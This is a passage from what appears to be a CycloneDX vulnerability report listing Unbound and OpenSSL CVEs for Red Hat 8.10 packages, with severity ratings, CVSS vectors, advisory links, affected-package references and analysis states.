          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42923",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        407
      ],
      "description": "NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability in the DNSSEC validator where the code path to consult the negative cache for DS records does not take into account the limit on NSEC3 hash calculations introduced in 1.19.1. This leads to degradation of service during the attack. An adversary that controls a DNSSEC signed zone can exploit this by signing NSEC3 records with acceptably high iterations for child delegations and querying a vulnerable Unbound. Unbound will keep performing the allowed hash calculations on the NSEC3 records and will not limit the work by the mitigation introduced in 1.19.1. As a side effect, a global lock for the negative cache will be held for the duration of the hashing, blocking other threads that need to consult the negative cache. Coordinated attacks could raise the vulnerability to denial of service. Unbound 1.25.1 contains a patch with a fix to bound the vulnerable code path with the existing limit for NSEC3 hash calculations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42923"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42923"
        },
        {
          "url": "https://nlnetlabs.nl/news/2026/May/20/unbound-1.25.1-released/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42923"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8282-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42923"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42923.txt"
        }
      ],
      "published": "2026-05-20T10:16:27+00:00",
      "updated": "2026-07-24T10:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42955",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        672
      ],
      "description": "In NLnet Labs Unbound 1.16.2 up to and including 1.25.1, a similar vulnerability as with CVE-2026-40622 in the 'ghost domain names' family of attacks was found in Unbound that could extend the ghost domain window by up to one cached TTL configured value for A/AAAA glue records. Similar to other 'ghost domain names' attacks, an adversary needs to control a (ghost) zone and be able to query a vulnerable Unbound. A single client A/AAAA query can cause Unbound to overwrite the cached expired parent-side glue rrset and essentially extend the ghost domain window by up to one cached TTL configured value ('cache-max-ttl'). In configurations where 'harden-referral-path: yes' is used (non-default configuration), no client query is required since Unbound implicitly performs that query. This is a variant of CVE-2026-40622 which only addressed the NS query.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42955"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42955"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42955"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42955"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42955.txt"
        }
      ],
      "published": "2026-07-22T14:17:18+00:00",
      "updated": "2026-07-24T13:56:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42960",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 10,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        349
      ],
      "description": "NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to poisoning via promiscuous records for the authority section. Promiscuous RRSets that complement DNS replies in the authority section can be used to trick Unbound to cache such records. If an adversary is able to attach such records in a reply (i.e., spoofed packet, fragmentation attack) he would be able to poison Unbound's cache. A malicious actor can exploit the possible poisonous effect by injecting RRSets other than NS that are also accompanied by address records in a reply, for example MX. This could be achieved by trying to spoof a reply packet or fragmentation attacks. Unbound would then accept the relative address records in the additional section and cache them if the authority RRSet has enough trust at this point, i.e., in-zone data for the delegation point. Unbound 1.25.1 contains a patch with a fix that disregards address records from the additional section if they are not explicitly relevant only to authority NS records, mitigating the possible poison effect. This is a complement fix to CVE-2025-11411.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42960"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42960"
        },
        {
          "url": "https://nlnetlabs.nl/news/2026/May/20/unbound-1.25.1-released/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42960"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8282-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8282-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42960"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42960.txt"
        }
      ],
